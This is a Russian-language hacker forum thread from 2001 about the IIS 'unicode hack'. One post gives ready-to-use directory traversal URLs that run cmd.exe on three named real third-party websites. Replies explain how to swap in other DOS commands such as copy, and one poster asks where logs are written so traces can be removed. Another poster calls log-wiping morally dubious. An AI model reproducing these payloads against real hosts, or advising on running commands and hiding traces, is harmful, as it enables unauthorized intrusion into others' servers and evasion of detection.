Легенда:
новое сообщение
закрытая нитка
новое сообщение
в закрытой нитке
старое сообщение
|
- Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
- Новичкам также крайне полезно ознакомиться с данным документом.
 |  |  |  |  |
нафига же ты туда тогда полез? 24.10.01 16:21 Число просмотров: 984
Автор: Raver Статус: Незарегистрированный пользователь
|
> "чего ж ты выпендривался, если летать не умеешь?" (с) > Анекдот а я не выпендривался, мне просто делать нечего было....ради интереса....
|
|
<hacking>
|
а-ля =welcome to unicode hack=.. 22.10.01 20:29
|
www.partner-v.ru/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
risbank.spb.ru/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
www.alkor94.kz/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
а-ля взлом IIS...
|
 |
а-ля =welcome to unicode hack=.. 23.10.01 01:32
Автор: -boncho- Статус: Незарегистрированный пользователь
|
> www.partner-v.ru/_vti_bin/..%c0%af../..%c0%af../..%c0%af../ > winnt/system32/cmd.exe?/c+dir+c:\ > > risbank.spb.ru/_vti_bin/..%c0%af../..%c0%af../..%c0%af../wi > nnt/system32/cmd.exe?/c+dir+c:\ > > www.alkor94.kz/_vti_bin/..%c0%af../..%c0%af../..%c0%af../wi > nnt/system32/cmd.exe?/c+dir+c:\ > > а-ля взлом IIS...
а как здесь другие команды кроме dir использовать?
|
 |  |
а-ля =welcome to unicode hack=.. 23.10.01 02:09
Автор: ud Статус: Незарегистрированный пользователь
|
> а как здесь другие команды кроме dir использовать? гык +copy+file1+file2 и тд стандартные дос команды...
вот только...
1 - юникод это неспортивно
2 - раз серваки досих пор уязвимы,значит на них уже побывала туча народу.
3 - 2Raver - это не слишком хороший способ зачищать после себя логи (с моральной точки зрения)
|
 |  |  |
а-ля =welcome to unicode hack=.. 23.10.01 15:10
|
> > а как здесь другие команды кроме dir использовать? > гык +copy+file1+file2 и тд стандартные дос команды... > вот только... > 1 - юникод это неспортивно > 2 - раз серваки досих пор уязвимы,значит на них уже > побывала туча народу. > 3 - 2Raver - это не слишком хороший способ зачищать после > себя логи (с моральной точки зрения)
Да, согласен....
А ты не сожешь сказать вообще в какие места бросаются логи или куда могут, если использовать unicode?
|
 |  |  |  |
нафига же ты туда тогда полез? 23.10.01 21:40
Автор: ZaDNiCa <indeed ZaDNiCa> Статус: Elderman
|
|
"чего ж ты выпендривался, если летать не умеешь?" (с) Анекдот
|
 |  |  |  |  |
нафига же ты туда тогда полез? 24.10.01 16:21
|
> "чего ж ты выпендривался, если летать не умеешь?" (с) > Анекдот а я не выпендривался, мне просто делать нечего было....ради интереса....
|
 |  |  |  |  |  |
здесь описано http://www.uinc.ru/articles/zametki/007.shtml 25.10.01 04:05
Автор: grok Статус: Незарегистрированный пользователь
|
|
|
|
|